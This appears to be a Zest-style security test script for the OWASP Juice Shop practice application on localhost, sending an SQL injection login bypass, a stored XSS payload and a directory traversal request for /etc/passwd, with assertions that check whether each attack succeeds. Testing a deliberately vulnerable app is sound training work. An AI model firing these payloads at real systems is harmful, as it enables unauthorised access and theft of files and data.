// Zest Script for OWASP Juice Shop Offensive Testing

// Title: Offensive Test Script
"title": "Juice Shop Offensive Test",

// Description
"description": "Performs SQL Injection and XSS attacks to test Juice Shop vulnerabilities",

// Actions
"actions": [
  {
    "type": "request",
    "method": "POST",
    "url": "http://localhost:3000/rest/user/login", // Adjust URL if hosted elsewhere
    "headers": {
      "Content-Type": "application/json"
    },
    "body": "{ \"email\": \"' OR '1'='1\", \"password\": \"' OR '1'='1\" }", // SQL Injection
    "assertions": [
      {
        "type": "statusCode",
        "value": 200 // Check if unauthorized access is granted
      },
      {
        "type": "contains",
        "field": "body",
        "value": "authentication" // Check for successful login without valid credentials
      }
    ]
  },

  // XSS Attack
  {
    "type": "request",
    "method": "POST",
    "url": "http://localhost:3000/api/Feedbacks", // Feedback submission endpoint
    "headers": {
      "Content-Type": "application/json"
    },
    "body": "{ \"comment\": \"<script>alert('XSS')</script>\", \"rating\": 5 }", // XSS payload
    "assertions": [
      {
        "type": "statusCode",
        "value": 200
      },
      {
        "type": "contains",
        "field": "body",
        "value": "<script>alert('XSS')</script>" // Ensure payload is not sanitized
      }
    ]
  },

  // Directory Traversal
  {
    "type": "request",
    "method": "GET",
    "url": "http://localhost:3000/ftp/../../../../etc/passwd", // Attempt to access restricted files
    "assertions": [
      {
        "type": "statusCode",
        "value": 200 // Check if access to sensitive files is possible
      },
      {
        "type": "contains",
        "field": "body",
        "value": "root:" // Check for typical Linux passwd file content
      }
    ]
  }
]